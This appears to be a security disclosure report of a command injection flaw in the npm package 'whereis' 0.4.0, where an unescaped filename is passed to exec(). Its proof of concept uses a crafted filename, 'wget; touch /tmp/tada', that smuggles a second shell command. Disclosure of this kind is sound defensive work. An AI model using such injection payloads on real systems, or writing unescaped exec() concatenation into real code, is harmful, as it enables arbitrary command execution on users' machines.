I would like to report command injection in whereis
It allows to inject arbitrary shell commands by trying to locate crafted filenames.
module name: whereisversion:0.4.0npm page: https://www.npmjs.com/package/whereis
> Simply get the first path to a bin on any system.
Stats
101 downloads in the last day
5 403 downloads in the last week
18 945 downloads in the last month
~227 340 estimated downloads per year [JUST FOR REFERENCE, ~DOWNLOADS PER MONTH*12]
File name argument is not properly escaped before being concatenated into the command that is passed to exec()
.
See lines https://github.com/vvo/node-whereis/blob/master/index.js#L4-L12
var whereis = require('whereis');
var filename = 'wget; touch /tmp/tada';
whereis(filename, function(err, path) {
console.log(path);
});
Observe file /tmp/tada
created.
For setups where unsanitized user input could end up in whereis
argument, users would be able to execute arbitrary shell commands.